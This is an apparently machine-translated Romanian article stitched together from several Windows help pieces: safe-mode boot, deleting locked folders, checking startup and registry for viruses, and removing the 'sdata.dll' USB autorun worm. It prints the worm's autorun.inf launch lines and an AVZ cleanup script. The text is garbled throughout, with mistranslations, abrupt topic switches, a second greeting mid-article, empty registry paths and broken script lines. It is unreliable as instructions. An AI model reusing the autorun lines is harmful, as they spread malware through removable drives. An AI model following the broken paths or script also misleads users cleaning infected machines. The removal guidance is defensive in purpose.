Pentru a rula 8/10, faceți clic pe „ start" atunci " Închide", Apoi apăsați și mențineți apăsat Tasta Shift, și apoi "".
2. Computerul va porni în mediul de recuperare Windows 10, selectați „ Depanare – Opțiuni suplimentare – Opțiuni de pornireși apăsați butonul Reporniți”.
3. În opțiunile de pornire, faceți clic pe tasta F4 iar computerul va începe să pornească în modul sigur Windows 10.
Notă: Dacă doriți să vă conectați la Internet, atunci trebuie să apăsați tasta F5, care va activa Modul sigur cu suport pentru driverele de rețea.
Nu fi surprins dacă computerul tău rulează mult mai repede în modul Safe, ar putea fi un semn că sistemul tău este infectat. malware, și poate doar foarte, foarte multe programe sunt încărcate automat la pornirea Windows.
Pasul 2. Ștergeți fișierele temporare Windows
Ștergeți și puteți sări peste acest pas. Dar este posibil să ștergeți și curatarea geamurilor, va accelera ușor scanarea sistemului cu un antivirus în viitor și chiar va ajuta să scăpați de unele programe rău intenționate.
Dacă nu știți cum să ștergeți un folder care nu este șters, atunci materialul nostru vă va ajuta să vă dați seama.
Toată lumea se ocupă periodic de foldere „nedemontabile” de pe un computer.
A da vina pe oricine pentru asta este o prostie, chiar și un sistem care ne spune că se află un anumit director acest moment timpul este ocupat cu un proces.
Ca rezultat, toate manipulările de lichidare se termină cu un fiasco. Ajungerea la subiectul principal: cum să ștergeți un folder care nu este șters pe Windows 7 (win8)?
Există 5 opțiuni pentru rezolvarea problemei:
Să încercăm să facem față situației.
Reporniți
Deci, intenționați să ștergeți directorul nefericit, dar sistemul susține că nu poate face acest lucru dintr-un motiv sau altul. Motivul principal este utilizarea fișierelor din folder de către o aplicație sau un proces care rulează în prezent.
Exemplul arată că este imposibil să lichidați folderul „capturi de ecran”, deoarece unul sau mai multe fișiere sunt acum utilizate de unul dintre programe Windows... Deoarece majoritatea nu știu care dintre ele, nu au de ales decât să repornească mașina.
Faceți clic pe „Start” (1), apoi faceți clic pe pătratul mic (2) lângă butonul „închidere”. Selectăm elementul cu repornire (3).
Verificarea sistemului
Dacă nu doriți să reporniți, dar ați decis să ajungeți la fundul adevărului, verificați dacă aplicația care rulează în prezent se află în folder.
Să presupunem că ai decis să scapi de Skype dintr-un motiv oarecare, nu dezinstalându-l, ci ștergând în mod barbar folderul care conține tot conținutul programului. Să luăm în considerare această opțiune.
Mai întâi, să deschidem folderul. Urmăm calea: Drive C - Program Files - Skype.
Vedem această poză.
Și asta este ceea ce oferă sistemul dacă apăsați „Șterge” de pe tastatură.
În primul rând, programul rulează, așa că sistemul a blocat opțiunea de dezinstalare. În al doilea rând, se „atârnă” în managerul de activități, și anume în procese.
Trebuie să închideți programul și, pentru orice eventualitate, să „omorâți” procesul, astfel încât notificarea să nu fie afișată din nou.
Ieșiți din Skype, apoi apăsați Ctrl + Alt + Delete (manager de activități) și selectați programul. După aceea, faceți clic pe butonul „Încheierea procesului”.
Va apărea o fereastră cu o confirmare a intenției. Faceți clic din nou pentru a finaliza. Acum știi cum să ștergi un folder care nu poate fi șters pe Windows 8 și alte versiuni ale sistemului de operare.
Notă! Procedura de mai sus este la fel de utilă pentru toate astfel de cazuri, nu doar pentru Skype.
Viruși
În unele cazuri, ștergerea unui director este imposibilă din motivul elementar că software-ul potențial nedorit a pătruns în computer, de exemplu. virusuri. Pe lângă internet, pot intra în computer printr-o unitate flash.
Și cum să ștergeți un folder care nu este șters de pe o unitate flash USB? Așa este, prin pre-verificare cu un antivirus.
Deschidem antivirusul și scanăm unitatea. Apoi încercăm să ștergem folderul. Dacă nu funcționează, va trebui să formatați unitatea flash USB.
Notă! Rețineți, formatarea va șterge toate datele, folderele și fișierele stocate pe memoria flash.
Procedura este după cum urmează. Faceți clic dreapta pe unitate și selectați „format”.
În fața noastră este un meniu cu setări.
- Capacitate flash drive;
- Sistemul de fișiere;
- Etichetă de volum (numele unității);
- Metoda de formatare;
- Demararea procesului.
Accentul principal este pe sistemul de fișiere. FAT 32 ar trebui să fie selectat implicit. Deci, conținutul unității poate fi „citit” de orice PC. Orice nume poate fi dat, deoarece nu afectează niciun parametru.
Dar pentru o formatare mai bună, bifați caseta „ curatare rapida„Mai bine să decolam. Apăsăm „start” și așteptăm.
Setări pentru foldere
Acest truc este bun pentru directoarele de rețea. Cu alte cuvinte, mai multe PC-uri sunt unite într-o singură subrețea. Administratorul creează unul sau mai multe foldere partajate unde puteți arunca diverse informații. Pentru ca nimeni să nu-l ștergă neintenționat, se stabilește drepturi de acces.
Acest lucru se face după cum urmează. Mai întâi, deschideți proprietățile folderului cu butonul din dreapta.
Accesați secțiunea „Securitate” și faceți clic pe „Avansat”.
Selectăm un grup sau un utilizator căruia îi „tăiem drepturile”.
Selectați din nou grupul și acum setăm nivelul de acces.
Dacă bifați casetele de pe două elemente legate de ștergere, un utilizator din rețea nu va putea șterge nici folderul, nici conținutul acestuia.
După aceea, puteți scăpa cu ușurință de aplicație, deoarece am „omorât-o”.
În acest mod simplu, puteți curăța sistemul de alte programe, aplicații și foldere.
A spune că această metodă este concepută pentru leneși este imposibil. În orice caz, va trebui să știți locația în care este stocat folderul. Pe de altă parte, toate programele sunt instalate inițial în folderul Program Files.
Cum să ștergeți un folder care nu este șters de pe desktop și din alte locuri de pe computer? Urmând sfaturile noastre, puteți scăpa cu ușurință de diverse programe care sunt stocate în directoare. Acesta din urmă, la rândul său, poate fi ușor și natural eliminat.
Important! Sistemul nu va „înjură” niciodată dacă lista de fișiere din folder nu este folosită nicăieri în acest moment. Fie că este vorba de o colecție de fotografii, filme sau muzică. Dacă nu utilizați fișierul, dar dintr-un motiv inexplicabil nu vă puteți curăța computerul, atunci conținutul directorului este pur și simplu infectat cu un virus. Pentru orice eventualitate, scanați sistemul pentru software nedorit și aveți grijă când descărcați ceva de pe Internet.
În toate celelalte cazuri, de vină este neglijența banală și nedorința de a citi mesajul casetei de dialog, care explică clar motivul imposibilității ștergerii folderului.
Când un virus intră într-un computer, virusul tinde să se înregistreze la pornire și apoi în registry. Pentru utilizatorii neexperimentați, aceste cuvinte spun puțin. Un virus este un software care vă dăunează computerului, poate fi și scripturi sau arhive infectate și fișiere pdf... În momentul expunerii, virusul începe să se autopropagă, în timp ce exe și fișierele bat, și arhive zipși rar.
La ce ar trebui să fii atent dacă bănuiești sau ți-ai scanat computerul cu utilitare antivirus, dar problema persistă, în primul rând ne uităm la pornire. Pentru a face acest lucru, introduceți următoarele comenzi în linia de comandă:
1. Deschideți: Start, apoi faceți clic pe Run sau în bara de căutare „msconfig.exe”
Se deschide o fereastră: „Configurare sistem”, faceți clic pe fila „Startup” și vedeți ce avem acolo în autorun. În primul rând, acordați atenție numelor programelor, precum și numelui fișierului și căii locației acestuia. De obicei, virușii sunt fișiere cu nume imposibil de citit sau fișiere ale căror nume constau în numere, să spunem „004284.exe” „73294.exe”.
2. Debifați aceste tipuri de programe, faceți clic pe butonul „Aplicați”, apoi pe „OK”.
Următorul pas este editarea registrului. De ce și de ce trebuie să facem asta. La configurarea încărcării automate, prin configurarea sistemului, ceva de care nu avem nevoie nu este întotdeauna eliminat din încărcare automată.
1. Deschideți meniul „Start”, căutați bara de căutare sau fila „Run”, introduceți comanda „regedit”. Se deschide fereastra editorului de registry.
2. În primul rând, verificați filiala:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ WindowsNT \ CurrentVersion \ Winlogon
Căutăm intrarea „Shell” în listă (XP) În Windows7, această secțiune nu este. Uite: valoarea parametrului, implicit ar trebui să fie „Explorer.exe”, dacă mai există ceva, șterge-l.
Bună ziua tuturor! Astăzi aș vrea să vorbesc despre un virus care se răspândește pe internet, rețea locală, flash- transportatorii. Acest virus are caracteristicile unui rootkit, troian, vierme de rețea. Acest virus este definit ca:
— Trojan.Siggen2.28594în drWEB Antivirus.
— W32 / Dx.VUM!Trîn Fortinet Antivirus.
— Worm.Win32.AutoRun.hdf la Kaspersky Lab.
Acest virus a fost dezvoltat de programatori ruși și este destinat unei platforme OS pe 32 de biți Windows cu procesor x86(fișier ca - Executabil portabil,PE).
Acest virus conține mai multe fișiere de bază.
Cum să faci fișierele și folderele ascunse de un virus vizibile în articol = >><<=
. mdhevw.exe(opțional, poate fi orice fișier * .exe) atribute ale acestui fișier:
—Ascuns,
—Sistemică,
—Doar lectură.
Importă biblioteca de sistem kernel32.dll (LoadLibraryA, GetProcAddress);
. sdata.dll(practic un fișier persistent cu orice modificări). bătătorit UPX... Atributele acestui fișier:
-Ascuns,
-Sistem,
- Doar lectură.
Importă biblioteci de sistem: KERNEL32.DLL(LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, Virtualfree),
advapi32.dll(RegCloseKey), ntdll.dll (ZwOpenProcess), oleaut32.dll (SysFreeString), user32.dll(CharNextA);
. autoRuN.iNF(fișierul obligatoriu, este cel principal pentru distribuție). Atributele acestui fișier:
—Ascuns,
—Doar lectură.
Conținutul fișierului autoRuN.iNF:
Deschide = mdhevw.exe -flash
Utilizați redare automată = 1
Acțiune = Deschideți folderul pentru a vizualiza fișierele
shell \ open \ Command = mdhevw.exe -flash
shell \ open \ Implicit = 1
shell \ explore \ Command = mdhevw.exe -flash
unde sa caut?
- virus este implementat în ( Windows XP) sau \ Utilizatori \ Toți utilizatorii \ (Windows Vistași Windows 7) creează un director;
Fișierele sunt create în mdhevw.exeși sdata.dll;
- mdhevw.exeși autoRuN.iNF copiat în directoarele rădăcină ale tuturor unităților locale și amovibile;
-mdhevw.exeși autoRuN.iNF sunt de asemenea copiate în rădăcina unităților detașabile nou montate.
Tot in registrul dat virus creează baza pentru acțiuni ulterioare.
este creat un parametru cu o valoare
(v Windows Vistași Windows 7 - );
Același fel virus descărcare blocuri OSWindows v Modul sigur,ștergerea cheilor corespunzătoare Registru;
- virus de asemenea, previne deconectarea unităților amovibile (folosind codul Îndepărtați hardware-ul în siguranță);
În general nu foarte bine virusși foarte enervant și își amintește constant de el însuși în timp ce conectează medii amovibile. La universitatea în care lucrez la momentul scrierii acestui articol, el este peste tot și peste tot, de vreme ce domnilor, studenții sunt „comercianții ambulanți” ai acestei infecții... Dar acum nu este vorba despre asta.
Cum să identifici un virussdata. dll/ ?
AutoRuns găsește prezența unui fișier suspect la pornire.
Cum să eliminați un virus sdata.dll? dacă antivirusul eșuează.
Există multe modalități de a elimina virusul sdata / srtserv din sistemul de operare. Vom acoperi câteva metode.
Numărul metodei ori: eliminarea virusului sdata / manual.
1) Pentru a elimina virusul manual avem nevoie de utilitarul AutoRuns. Ne arată în detaliu de ce și de unde începe. Găsim procesul rău intenționat și îl ștergem.
C: \ Documente și setări \ Toți utilizatorii \ Date aplicație \ srtserv \
V Windows Vistași Windows 7:
C:\ Utilizatori\ Toți utilizatorii\ \
Sau puteți reporni sistemul de operare și porniți fără acest proces, deoarece l-am eliminat de la pornire.
Important! În directoarele rădăcină ale tuturor unităților locale și mediilor amovibile, trebuie să ștergeți fișierele mdhevw.exeși autoRuN.iNF.
Și, în sfârșit, verificați computerul pentru prezența unui program antivirus cu baze de date actualizate. virusuri pentru a vă asigura că totul este șters.
Metoda numărul doi: eliminați sdata/virusulcu ajutorTrăiCD(disc de pornire).
În zilele noastre există o mulțime de Live CD-uri precum Windows miniPE sau Comandantul ERD;
Voi da un exemplu cu un disc Comandantul ERD.
Introduceți discul cu Comandantul ERD v CD-ROM și reporniți computerul;
În timpul pornirii, accesați BIOS (Tasta del, F2, Esc);
Instalați boot de pe unitatea CD / DVD și salvați;
La fereastră Bine ati venit la ERD Comandant selectați sistemul de operare și faceți clic Bine;
După încărcare Desktop, mergi la Calculatorul meu;
In catalog
\ Documente și setări \ Toți utilizatorii \ Date aplicație \ (Windows XP)
\ Utilizatori \ Toți utilizatorii \ (Windows Vistași Windows 7)
ștergeți directorul (împreună cu fișierele mdhevw. exeși sdata. dll);
De asemenea, ștergem fișierele din directoarele rădăcină ale tuturor discurilor locale. mdhevw.exeși autoRuN.iNF;
Clic Start - Instrumente administrative - RegEdit;
Mergeți la filiala registrului
;
Acum trebuie să eliminați parametrul cu valoarea
C: \ Documents and Settings \ All Users \ Application Data \ srtserv \ mdhevw.exe
v Windows Vistași Windows 7
C: \ Utilizatori \ Toți utilizatorii \ srtserv \ mdhevw.exe
;
Este necesar să se verifice valoarea parametrului Coajă(valoarea ar trebui să fie Explorer.exe);
Verificăm și valoarea parametrului Userinit ( ar trebui să fie C: \ Windows \ system32 \ userinit.exe);
Repornim computerul.
Se încarcă Windowsîn mod normal;
Dacă după repornire apare un mesaj că profilul de utilizator nu a fost găsit, procedați în felul următor:
Start -> Run ... ->în câmp Deschis introduce regedit -> OK;
Extinderea sucursalei de registru
;
Eliminarea unui parametru cu o valoare
C: \ Documents and Settings \ All Users \ Application Data \ srtserv \ mdhevw.exe
v Windows Vistași Windows 7
C: \ Utilizatori \ Toți utilizatorii \ srtserv \ mdhevw.exe
A închide Editor de registru;
Trecem:
Start -> Run ... -> introduce regsvr32 / i shell32.dll -> OK;
Va apărea o fereastră RegSvr32 cu un mesaj „DllRegisterServer și DllInstall în shell32.dll au fost finalizate cu succes”, faceți clic Bine;
Pentru ca sistemul să nu se autoinfesteze, dezactivați restaurarea sistemului (sau ștergeți manual folderul Informații despre volumul sistemului);
Curățăm memoria cache a fișierelor de Internet;
Reporniți;
Acum să scanăm sistemul cu un antivirus cu baze de date proaspete.
Metoda numărul trei: eliminați sdata / virusulcu ajutorul utilitaruluiAVZ.
Mai convenabil, deoarece totul se întâmplă automat.
Pentru aceasta metoda avem nevoie de utilitarul AVZ.
Și așa descarcăm AVZ, despachetăm, rulăm fișierul avz.exe în numele Administratorului.
Și introduceți scriptul de mai jos:
_________________________
începe
SearchRootkit (adevărat, adevărat);
SetAVZGuardStatus (Adevărat);
Fișier carantina ("C: \ Documente și setări \ Toți utilizatorii \ Date aplicație \ srtserv \ slmvsrv.exe", "");
Fișier carantina ("C: \ Documente și setări \ Toți utilizatorii \ Date aplicație \ msuwarn \ slgssrv.exe", "");
Fișier carantina ("C: \ Documente și setări \ Toți utilizatorii \ Date aplicație \ srtserv \ sdata.dll", "");
TerminateProcessByName ("c: \ documente și setări \ toți utilizatorii \ date aplicație \ srtserv \ slmvsrv.exe");
slmvsrv.exe ");
DeleteFile ("C: \ Documente și setări \ Toți utilizatorii \ Date aplicație \ srtserv \ sdata.dll");
DeleteFile ("C: \ Documente și setări \ Toți utilizatorii \ Date aplicație \ msuwarn \ slgssrv.exe");
msuwarn");
DeleteFile ("C: \ Documente și setări \ Toți utilizatorii \ Date aplicație \ srtserv \ slmvsrv.exe");
RegKeyParamDel ("HKEY_LOCAL_MACHINE", "Software \ Microsoft \ Windows \ CurrentVersion \ Run", "");
DeleteFile ("C: \ WINDOWS \ system32 \ cmdow.exe");
DeleteFileMask ("C: \ Documente și setări \ Toți utilizatorii \ Date aplicație \ msuwarn"," *. * ", Adevărat);
DeleteDirectory ("C: \ Documente și setări \ Toți utilizatorii \ Date aplicație \ msuwarn");
DeleteFileMask (": \ Documente and Settings \ All Users \ Application Data \", "*. *", True);
DeleteDirectory (": \ Documente and Settings \ All Users \ Application Data \");
BC_ImportDeletedList;
ExecuteSysClean;
BC_Activate;
ExecuteRepair (8);
Reporniți Windows (adevărat);
Sfârșit.
_________________________
Notă: Numele fișierelor îngroșate în acest script pot diferi, deoarece virusul este în mod constant modificat, așa că aveți grijă și, pentru a evita erorile, indicați corect numele fișierelor, care, la rândul lor, se află în director
Iată câteva metode pentru a face această lume mai curată!
Care ar trebui să fie sfârșitul asta. Cred că acest articol va fi util și va ajuta mulți oameni.
De asemenea, vă rog să lăsați un comentariu la acest articol, cum v-a ajutat sau orice clarificări. Voi fi bucuros să ajut!
Îndepărtăm virusul care ascunde folderele și se răspândește pe unitățile flash
Descrierea completă a serviciului de streaming
Cum se creează un portofel WebMoney Instrucțiuni detaliate pentru înregistrarea în webmoney
Un program pentru optimizarea și accelerarea Windows
Creșterea memoriei cache în browserul Yandex Cum să creșteți memoria cache în Mozilla
Cum trimiteți prin e-mail un fișier sau un folder
Driver pentru Wi-Fi și LAN pentru laptop Acer
Înregistrați noua pagină VKontakte